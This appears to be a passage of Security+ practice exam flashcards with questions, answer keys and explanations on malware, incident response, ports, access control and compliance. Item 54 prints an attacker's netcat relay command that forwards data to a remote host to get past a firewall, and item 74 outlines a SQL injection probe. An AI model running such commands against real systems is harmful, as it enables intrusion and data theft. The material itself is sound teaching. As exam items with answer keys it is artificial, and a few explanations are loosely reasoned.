What type of malicious application does not require user intervention or another application to act as a host in order for it to replicate?

a. Virus
b. Worm
c. Macro
d. Trojan

A

b. Worm

OBJ-1.2: A worm is a self-replicating type of malware that does not require user intervention or another application to act as a host in order for it to replicate. Viruses and Macros require user intervention to spread, and Trojans are hosted within another application that appears to be harmless.

44
Q

A small business recently experienced a catastrophic data loss due to flooding from a recent hurricane. The customer had no backups, and all of the hardware associated with the small business was destroyed during the flooding. As part of the rebuilding process, the small business contracts with your company to help create a disaster recovery plan to ensure this never recurs. Which of the following recommendations should you include as part of the disaster recovery plan?

a. Local backups should be conducted
b. Backups should be conducted to a cloud-based storage solution
c. Purchase waterproof devices to prevent data loss
d. Local backups should be verified weekly to ensure no data loss occurs

A

b. Backups should be conducted to a cloud-based storage solution

OBJ-4.2: While losing the hardware is a problem for the small business, their insurance will replace the hardware if it is destroyed in a flood. The data involved is more of a concern. Therefore, backups should be the primary concern. Local backups are risky since they would be destroyed in another flood; therefore, using a cloud-based storage solution would be ideal and prevent future data loss.

45
Q

During which phase of the incident response process does an organization assemble an incident response toolkit?

a. Post-incident activity
b. Containment, eradication, and recovery
c. Detection and analysis
d. Preparation

A

d. Preparation

OBJ-4.2: During the preparation phase, the incident response team conducts training, prepares their incident response kits, and researches threats and intelligence. During the detection and analysis phase, an organization focuses on monitoring and detecting any possible malicious events or attacks. During the containment, eradication, and recovery phase of an incident response, an analyst must preserve forensic and incident information for future needs, to prevent future attacks, or to bring up an attacker on criminal charges. During the post-incident activity phase, the organization conducts after-action reports, creates lessons learned, and conducts follow-up actions to better prevent another incident from occurring.

46
Q

Which type of monitoring would utilize a network tap?

a. Passive
b. Router-based
c. Active
d. SNMP

A

a. Passive

OBJ-3.3: Network taps are devices that allow a copy of network traffic to be captured for analysis. They conduct passive network monitoring and visibility without interfering with the network traffic itself. Active monitoring relies on the scanning of targeted systems, not a network tap. Router-based monitoring would involve looking over the router’s logs and configuration files. SNMP is used to monitor network devices, but is considered a form of active monitoring and doesn’t rely on network taps.

47
Q

Which of the following would NOT be useful in defending against a zero-day threat?

a. Threat intelligence
b. Whitelisting
c. Segmentation
d. Patching

A

d. Patching

OBJ-1.6: While patching is a great way to combat threats and protect your systems, it is not effective against zero-day threats. By definition, a zero-day threat is a flaw in software, hardware or firmware that is unknown to the party or parties responsible for patching or otherwise fixing the flaw. This attack has no time (or days) between the time the vulnerability is discovered and the first attack, and therefore no patch would be available to combat it. By using segmentation, whitelisting, and threat intelligence, a cybersecurity analyst can put additional mitigations in place that would protect the network even if a zero-day attack was successful.

48
Q

An analyst just completed a port scan and received the following results of open ports:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
TCP: 80
TCP: 110
TCP: 443
TCP: 1433
TCP: 3306
TCP: 3389
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on these scan results, which of the following services are NOT currently operating?

a. SSH
b. RDP
c. Database
d. Web

A

a. SSH

OBJ-4.3: Based on the port numbers shown as open in the nmap scan results, SSH is not currently operating. SSH operates over port 22. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389.

49
Q

What access control model will a network switch utilize if it requires multilayer switches to use authentication via RADIUS/TACACS+?

a. 802.3af
b. 802.1x
c. 802.1q
d. 802.11ac

A

b. 802.1x

OBJ-3.8: If you are using RADIUS/TACACS+ with the switch, you will need to use 802.1x for the protocol.

50
Q

Which law requires that government agencies and other organizations that operate systems on behalf of government agencies to comply with security standards?

a. COPPA
b. SOX
c. FISMA
d. HIPAA

A

c. FISMA

OBJ-5.2: The Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or man-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPAA) is a United States federal law designed to provide privacy standards to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children’s Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age, and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes–Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.

51
Q

The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, “You will regret firing me; just wait until Christmas!” He suspects the message came from a disgruntled former employee that may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could create a negative effect on Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for?

a. Adware
b. Trojan
c. Logic bomb
d. Worm

A

c. Logic bomb

OBJ-1.2: A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files should they ever be terminated from the company. The director is concerned that a logic bomb may have been created and installed on his system or across the network before the employee was fired.

52
Q

You have just received some unusual alerts on your SIEM dashboard and want to collect the payloads associated with them. Which of the following should you implement to effectively collect these malicious payloads that the attackers are sending towards your systems without impacting your organization’s normal business operations?

a. Honeypot
b. Containerization
c. Jumpbox
d. Sandbox

A

a. Honeypot

OBJ-2.1: A honeypot is a host set up with the purpose of luring attackers away from the actual network components and/or discovering attack strategies and weaknesses in the security configuration. A jumpbox is a hardened server that provides access to other hosts. A sandbox is a computing environment that is isolated from a host system to guarantee that the environment runs in a controlled, secure fashion. Containerization is a type of virtualization applied by a host operating system to provision an isolated execution environment for an application.

53
Q

Following a root cause analysis of the unexpected failure of an edge router, a cybersecurity analyst discovered that the system administrator had purchased the device from an unauthorized reseller. The analyst suspects that the router may be a counterfeit device. Which of the following controls would have been most effective in preventing this issue?

a. Conduct secure supply chain management training
b. Increase network vulnerability scan frequency
c. Ensure all anti-virus signatures are up to date
d. Verify that all routers are patched to the latest release

A

a. Conduct secure supply chain management training

OBJ-5.3: Anti-counterfeit training is part of the NIST 800-53r4 control set (SA-19(1)) and should be a mandatory part of your supply chain management training within your organization. All other options may produce security gains in the network, but they are unlikely to reliably detect a counterfeit item or prevent its introduction into the organization’s supply chain. Training on detection methodologies (e.g., simple visual inspections) and training for acquisition personnel will better prevent recurrences.

54
Q

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?

a. Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080
b. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443
c. Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76
d. Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080

A

b. Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

OBJ-4.1: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character pipes the output of the first netcat command into the input of the second, so both commands run as a single pipeline. Next, netcat is being told to send that data to the given IP (192.168.1.76) over port 443. This is a common technique to try to bypass the firewall by sending traffic over port 443 (the port normally used for secure SSL/TLS traffic).

55
Q

Review the network diagram provided. Which of the following ACL entries should be added to the firewall to allow only the system administrator’s computer (IT) to have SSH access to the FTP, Email, and Web servers in the DMZ? (Note: The firewall in this network is using implicit deny to maintain a higher level of security. ACL entries are in the format of Source IP, Destination IP, Port Number, TCP/UDP, Allow/Deny.)

Internet connected to a Hub
Hub connects to a Router.
3 areas branching out of the Router: DMZ, Intranet Workstations, Data Center

DMZ:
FTP 192.168.0.5
Web 192.168.0.6
Email 192.168.0.7

Intranet Workstations:
Sales 172.16.1.2
HR 172.16.1.3
IT 172.16.1.4

Data Center:
Backup 192.168.1.10
Confidential 192.168.1.11
Files 192.168.1.12

a. 192.168.0.0/24, 172.16.1.4, 22, TCP, ALLOW
b. 192.168.0.0/24, 172.16.1.4, ANY, TCP, ALLOW
c. 172.16.1.4, 192.168.0.0/24, ANY, TCP, ALLOW
d. 172.16.1.4, 192.168.0.0/24, 22, TCP, ALLOW

A

d. 172.16.1.4, 192.168.0.0/24, 22, TCP, ALLOW

OBJ-3.3: Since the scenario requires you to set up SSH access from the IT computer to all three servers in the DMZ, you will need to use a /24 subnet to set up the ACL rule correctly (or have 3 separate ACL entries). Since you can only select one in this example, you will have to use the /24 for the destination network. This means that the Source IP is 172.16.1.4 (IT computer), the Destination IP is 192.168.0.0/24 (the entire DMZ), the port is 22 for SSH and operates over TCP, and the condition is set to ALLOW.

56
Q

Which of the following would NOT be included in a company’s password policy?

a. Password history
b. Password style
c. Password complexity requirement
d. Password age

A

b. Password style

OBJ-3.7: A password policy is a set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly. A password policy is often part of an organization’s official regulations and may be taught as part of security awareness training. It contains items like password complexity, password age, and password history requirements.

57
Q

You have been asked to install a computer in a public workspace. The computer should only be used by an authorized user. Which of the following security requirements should you implement to prevent unauthorized users from accessing the network with this computer?

a. Disable single sign-on
b. Require authentication on wake-up
c. Remove the guest account from the administrator group
d. Issue the same strong and complex password for all users.

A

b. Require authentication on wake-up

OBJ-3.8: To prevent the computer from being used inadvertently to access the network, the system should be configured to require authentication whenever the computer is woken up. Therefore, if an authorized user walks away from the computer and it goes to sleep, when another person tries to use the computer, it will ask for a username and password prior to granting them access to the network.

58
Q

Which of the following must be combined with a threat to create risk?

a. Malicious actor
b. Vulnerability
c. Mitigation
d. Exploit

A

b. Vulnerability

OBJ-1.6: A risk results from the combination of a threat and a vulnerability. A vulnerability is a weakness in a device, system, application, or process that might allow an attack to take place. A threat is an outside force that may exploit a vulnerability. Remember, a vulnerability is something internal to your organization’s security goals. Therefore, you can control, mitigate, or remediate a vulnerability. A threat is external to your organization’s security goals. A threat could be a malicious actor, a software exploit, a natural disaster, or other external factors. In the case of an insider threat, they are considered an external factor for the purposes of threats and vulnerabilities since their goals lie outside your organization’s security goals.

59
Q

Dion Training allows its visiting business partners from CompTIA to use an available Ethernet port in their conference room to establish a VPN connection back to the CompTIA internal network. The CompTIA employees should be able to obtain internet access from the Ethernet port in the conference room, but nowhere else in the building. Additionally, if a Dion Training employee uses the same Ethernet port in the conference room, they should be able to access Dion Training’s secure internal network. Which of the following technologies would allow you to configure this port and support both requirements?

a. Configure a SIEM
b. Implement NAC
c. MAC filtering
d. Create an ACL to allow access

A

b. Implement NAC

OBJ-3.3: Network Access Control (NAC) uses a set of protocols to define and implement a policy that describes how to secure access to network nodes whenever a device initially attempts to access the network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before allowing network access. Network Access Control can control access to a network with policies, including pre-admission endpoint security policy checks and post-admission controls over where users and devices can go on a network and what they can do. In this scenario, implementing NAC can identify which machines are known and trusted Dion Training assets, and provide them with access to the secure internal network. NAC could also determine which are unknown machines (assumed to be those of CompTIA employees), and provide them with direct internet access only by placing them onto a guest network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by itself control which set of network resources could be utilized from a single Ethernet port. A security information and event management (SIEM) system provides real-time analysis of security alerts generated by applications and network hardware. An access control list could define which ports, protocols, or IP addresses could be used from the Ethernet port, but it would be unable to distinguish between a Dion Training employee’s laptop and a CompTIA employee’s laptop like a NAC implementation could.

60
Q

(Sample Simulation – On the real exam for this type of question, you would receive 3-5 pictures and be asked to drag and drop them into place next to the correct term.)

Picture of a hook with a paper that says: Enter your login information: User name, password

Which of the following types of attacks occurs when an attacker attempts to gain confidential information or login credentials by sending targeted emails to a specific set of recipients within an organization?

a. Phishing
b. Spear phishing
c. Hoax
d. Vishing
e. Pharming

A

b. Spear phishing

OBJ-1.1: Spear phishing is the fraudulent practice of sending emails from a seemingly known or trusted sender in order to induce targeted individuals to reveal confidential information. The key to answering this question is that the attack was focused on a targeted set of people, not just an indiscriminate large group of random people.

61
Q

A vulnerability scanner has reported that a vulnerability exists in the system. Upon validation of the report, the analyst determines that this reported vulnerability does not exist on the system. What is the proper term for this situation?

a. True negative
b. False positive
c. True positive
d. False negative

A

b. False positive

OBJ-1.7: A false positive occurs when a vulnerability is detected by a scanner, but the vulnerability does not actually exist on the scanned system. A true positive occurs when a vulnerability is detected by a scanner, and the vulnerability exists on the scanned system. A true negative occurs when a vulnerability is not detected by a scanner because the vulnerability does not exist on the scanned system. A false negative occurs when a vulnerability is not detected by a scanner, but the vulnerability does actually exist on the scanned system.

62
Q

An internet marketing company decided that they didn’t want to follow the rules for GDPR because it would create too much work for them. They wanted to buy insurance, but no insurance company would write them a policy to cover any fines received. They considered how much the fines might be, and decided to simply ignore the regulation and its requirements. Which of the following risk strategies did the company choose?

a. Acceptance
b. Mitigation
c. Avoidance
d. Transference

A

a. Acceptance

OBJ-5.4: The internet marketing company initially tried to transfer the risk (buy insurance), but then decided to accept the risk. To avoid the risk, the company would have changed the way it did business or would have prevented European customers from signing up on their mailing list using geolocation blocks.

63
Q

Joseph would like to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS system?

a. Route poisoning
b. Anti-malware router filters
c. DNS blackholing
d. Subdomain whitelisting

A

c. DNS blackholing

OBJ-2.1: DNS blackholing is a process that uses a list of known domains/IP addresses belonging to malicious hosts and uses an internal DNS server to create a fake reply. Route poisoning prevents networks from sending data somewhere when the destination is invalid. Routers do not usually have an anti-malware filter, and this would be reserved for a unified threat management system. Subdomain whitelisting would not apply here because it would imply that you are implicitly denying all traffic and only allowing whitelisted subdomains to be accessed from the hosts, which would affect their operational utility to the organization.

64
Q

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?

a. Man-in-the-Middle
b. Spoofing
c. Brute force attack
d. Privilege escalation

A

c. Brute force attack

OBJ-1.2: Since the policy will lock out the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective.

65
Q

(Sample Simulation – On the real exam for this type of question, you would have to rearrange the ports into the proper order by dragging and dropping them into place.)

  1. SCP
  2. POP3
  3. SNMP
  4. Telnet

161, 22, 23, 110

Using the image provided, place the port numbers in the correct order with their associated protocols:

a. 161, 22, 110, 23
b. 110, 161, 23, 22
c. 23, 110, 22, 161
d. 22, 110, 161, 23

A

d. 22, 110, 161, 23

OBJ-3.1: For the exam, you need to know your ports and protocols. Secure Copy (SCP) operates over port 22. Telnet operates over port 23. The Simple Network Management Protocol (SNMP) operates over port 161. The Post Office Protocol 3 (POP3) operates over port 110.

66
Q

A financial services company wants to donate some old hard drives from their servers to a local charity, but they are concerned about the possibility of residual data being left on the drives. Which of the following secure disposal methods would you recommend the company use?

a. Cryptographic erase
b. Zero-fill
c. Overwrite
d. Secure erase

A

a. Cryptographic erase

OBJ-3.2: In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is often used with solid-state devices. Cryptographic erase can be used with hard drives, as well. Zero-fill is a process that fills the entire storage device with zeroes. For SSDs and hybrid drives, zero-fill-based methods might not be reliable because the device uses wear-leveling routines in the drive controller to communicate which locations are available for use to any software process accessing the device. A secure erase is a special utility provided with some solid-state drives that can perform the sanitization of flash-based devices. Overwrite is like zero-fill but can utilize a random pattern of ones and zeroes on the storage device. The most secure option would be a cryptographic erase (CE) for the scenario provided in the question.

67
Q

Which type of threat will patches NOT effectively combat as a security control?

a. Discovered software bugs
b. Known vulnerabilities
c. Malware with defined indicators of compromise
d. Zero-day attacks

A

d. Zero-day attacks

OBJ-1.6: Zero-day attacks have no known fix, so patches will not correct them. A zero-day vulnerability is a computer-software vulnerability that is unknown to, or unaddressed by, those who should be interested in mitigating the vulnerability (including the vendor of the target software). If a discovered software bug or known vulnerability is found, there is normally a patch or mitigation available for it. If a piece of malware has well-defined indicators of compromise, a patch or signature can be created to defend against it, as well.

68
Q

The paparazzi have found copies of pictures of a celebrity’s new baby online. The celebrity states they were never publicly released but were uploaded to their cloud provider’s automated photo backup. Which of the following threats was the celebrity MOST likely a victim of?

a. Unauthorized camera activation
b. Unauthorized root access
c. Unintended Bluetooth pairing
d. Leaked personal files

A

d. Leaked personal files

OBJ-1.2: When authorized users access devices through unintended connections or unauthorized users get their hands on lost or stolen devices, they can access data on the device(s) that they were never intended to see. Every firm should have a policy for protecting data (encryption) and dealing with leaks when they occur.

69
Q

What type of threat actor is highly funded and often backed by nation-states?

a. APT
b. Hacktivist
c. Script Kiddies
d. Insider Threat

A

a. APT

OBJ-1.5: Advanced Persistent Threats are a group of hackers with great capability and intent. They are often funded by nation-states and other large organizations to conduct highly covert hacks over a long period of time for political or economic gain. Script kiddies are people who use existing computer scripts or code to hack into computers, lacking the expertise to write their own. An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. A hacktivist is someone who uses hacking to bring about political and social change.

70
Q

(Sample Simulation – On the real exam for this type of question, you would have to rearrange the ports into the proper order by dragging and dropping them into place.)

Using the image provided, place the port numbers in the correct order with their associated protocols:

  1. TFTP
  2. SMTP
  3. HTTP
  4. DNS

Ports: 53, 69, 25, 80

a. 25, 80, 53, 69
b. 80, 53, 69, 25
c. 53, 69, 25, 80
d. 69, 25, 80, 53

A

d. 69, 25, 80, 53

OBJ-3.1: For the exam, you need to know your ports and protocols. The Trivial File Transfer Protocol (TFTP) uses port 69. The Simple Mail Transfer Protocol (SMTP) uses port 25. The Hypertext Transfer Protocol (HTTP) uses port 80. The Domain Name Service (DNS) protocol uses port 53.

71
Q

You have been investigating how a malicious actor was able to exfiltrate confidential data from a web server to a remote host. After an in-depth forensic review, you determine that the web server’s BIOS had been modified by the installation of a rootkit. After you remove the rootkit and reflash the BIOS to a known good image, what should you do in order to prevent the malicious actor from affecting the BIOS again?

a. Utilize secure boot
b. Install a host-based IDS
c. Install an anti-malware application
d. Utilize the integrity monitoring

A

a. Utilize secure boot

OBJ-3.2: Since you are trying to protect the BIOS, utilizing secure boot is the best choice. Secure boot is a security system offered by UEFI. It is designed to prevent a computer from being hijacked by a malicious OS. Under secure boot, UEFI is configured with digital certificates from valid OS vendors. The system firmware checks the operating system boot loader using the stored certificate to ensure that it has been digitally signed by the OS vendor. This prevents a boot loader that has been changed by malware (or an OS installed without authorization) from being used. The TPM can also be invoked to compare hashes of key system state data (boot firmware, boot loader, and OS kernel) to ensure they have not been tampered with by a rootkit. The other options are all good security practices, but they only apply once you have already booted into the operating system. This makes them ineffective against boot sector or rootkit attacks.

72
Q

Which of the following is a senior role with the ultimate responsibility for maintaining confidentiality, integrity, and availability in a system?

a. Privacy officer
b. Data steward
c. Data owner
d. Data custodian

A

c. Data owner

OBJ-5.5: A data owner is a person responsible for the confidentiality, integrity, availability, and privacy of information assets. They are usually senior executives with authority and responsibility. A data owner is responsible for labeling the asset and ensuring that it is protected with appropriate controls. The data owner typically selects the data steward and data custodian and has the authority to direct their actions, budgets, and resource allocations. The data steward is primarily responsible for data quality. This involves tasks such as ensuring data are labeled and identified with appropriate metadata, and that data is collected and stored in a format and with values that comply with applicable laws and regulations. The data custodian is the role that handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures. The privacy officer is the role responsible for oversight of any PII/SPI/PHI assets managed by the company.

73
Q

Dion Training has an open wireless network called “InstructorDemos” for its instructors to use during class, but they do not want any students connecting to this wireless network. The instructors need the “InstructorDemos” network to remain open since some of their IoT devices used during course demonstrations do not support encryption. Based on the requirements provided, which of the following configuration settings should you use to satisfy the instructors’ requirements and prevent students from using the “InstructorDemos” network?

a. MAC filtering
b. Signal strength
c. QoS
d. NAT

A

a. MAC filtering

OBJ-3.4: Since the instructors need to keep the wireless network open, the BEST option is to implement MAC filtering to prevent the students from connecting to the network while still keeping the network open. Since the instructors would most likely use the same devices to connect to the network, it would be relatively easy to implement a MAC filtering-based whitelist of devices that are allowed to use the open network and reject any other devices not listed by the instructors (like the students’ laptops or phones). Reducing the signal strength would not solve this issue since students and instructors are both in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the students from accessing or using the open network.

74
Q

You have been hired to perform a web application security test. During the test, you notice that the site is dynamic and, therefore, must be using a backend database. You decide you want to test to determine if the site is susceptible to a SQL injection. What is the first character that you should attempt to use in breaking a valid SQL request?

a. Exclamation mark
b. Single quote
c. Semicolon
d. Double quote

A

b. Single quote

OBJ-1.3: The single quote character (') is used because it is the string delimiter in SQL. With a single quote you delimit strings, and therefore you can test whether the strings are properly escaped in the targeted application or not. If they are not escaped directly, you can end any string supplied to the application and add other SQL code after that, which is a common technique for SQL injections. A semicolon is a commonly used character at the end of a line of code or command in many programming languages. An exclamation mark is often used to comment a line of code in several languages. Double quotes are often used to contain a string being passed to a variable.

75
Q

Which of the following types of attacks occurs when an attacker calls up people over the phone and attempts to trick them into providing their credit card information?

a. Hoax
b. Spear phishing
c. Phishing
d. Pharming
e. Vishing

A

e. Vishing

OBJ-1.1: Vishing is the fraudulent practice of making phone calls or leaving voice messages purporting to be from reputable companies in order to induce individuals to reveal personal information, such as bank details and credit card numbers.

76
Q

Which of the following types of remote access technologies should NOT be used in a network due to its lack of security?

a. RDP
b. SSH
c. VPN
d. telnet

A

d. telnet

OBJ-1.6: Telnet should not be used in a network due to its weak security posture. Telnet transmits all of the data in plain text (without encryption), including usernames, passwords, commands, and data files. For this reason, it should NEVER be used in production networks and has been replaced by SSH in most corporate networks.

77
Q

An attacker has compromised a virtualized server. You are conducting forensic analysis as part of the recovery effort but found that the attacker deleted a virtual machine image as part of their malicious activity. Which of the following challenges do you now have to overcome as part of the recovery and remediation efforts?

a. File formats used by some hypervisors cannot be analyzed with traditional forensic tools
b. The attack widely fragmented the image across the host file system
c. All log files are stored within the VM disk image, therefore, they are lost
d. You will need to roll back to an early snapshot and then merge any checkpoints to the main image

A

b. The attack widely fragmented the image across the host file system

OBJ-4.5: Due to the deletion of the VM disk image, you will now have to conduct file carving or other data recovery techniques to recover and remediate the virtualized server. If the server’s host uses a proprietary file system, such as VMFS on ESXi, this can further limit support by data recovery tools. The attacker may have widely fragmented the image across the host file system when they deleted the disk image. VM instances are most useful when they are elastic (meaning they optimally spin up when needed) and then destroyed without preserving any local data when security has performed the task, but this can lead to the potential of lost system logs. To prevent this, most VMs also save their logs to an external syslog server or file. Virtual machine file formats are image-based and written to a mass storage device. Depending on the configuration and VM state, security must merge any checkpoints into the main image using a hypervisor tool, rather than recovering from an old snapshot, and then roll forward. It is possible to load VM data into a memory analysis tool, such as Volatility, although the file formats used by some hypervisors require conversion first, or may not be supported by the analysis tool.

78
Q

What tool can be used as an exploitation framework during your penetration tests?

a. Nmap
b. Autopsy
c. Metasploit
d. Nessus

A

c. Metasploit

OBJ-4.1: The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can be used to perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

79
Q

Karen lives in an area that is prone to hurricanes and other extreme weather conditions. She asks you to recommend an electrical conditioning device that will prevent her files from being corrupted if the power to the building is unstable or lost. Additionally, she would like the computer to maintain power for up to an hour of uptime to allow for a graceful shutdown of her programs and computer. Which of the following should you recommend?

a. Power distribution unit
b. Line conditioner
c. Surge protector
d. Uninterruptible power supply

A

d. Uninterruptible power supply

OBJ-2.5: An uninterruptible power supply or uninterruptible power source (UPS) is an electrical apparatus that provides emergency power to a load when the input power source becomes too low, or the main power fails. A UPS provides near-instantaneous protection from input power interruptions by using a battery backup. The on-battery run-time of most uninterruptible power sources is usually short (less than 60 minutes) but sufficient to properly shut down a computer system.

80
Q

Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application?

a. MD5 or SHA1 hash digest of the file
b. Public key of the file
c. Private key of the file
d. File size and file creation date

A

a. MD5 or SHA1 hash digest of the file

OBJ-2.1: Keith should conduct a hash of the downloaded file and compare it against the MD5 hash digest listed on the server for this file. This file needs to be a verifiable MD5 hash file in order to validate that the file integrity has not been compromised during the download. This is an important step to ensure the file was not modified in transit during the download. The other options are insufficient to guarantee the integrity of the downloaded file since integrity checking relies on the comparison of the two hash digests. A public or private key would not be assigned solely to a single file, nor do they provide integrity on their own. Public and private keys are used to ensure the confidentiality of data, whereas a hash digest ensures integrity. The file size and file creation date are additional forms of metadata that could be used to help validate the integrity of a file, but they are of a much lower quality and trust factor than using a hash digest. Therefore, MD5 or SHA1 is still a better choice.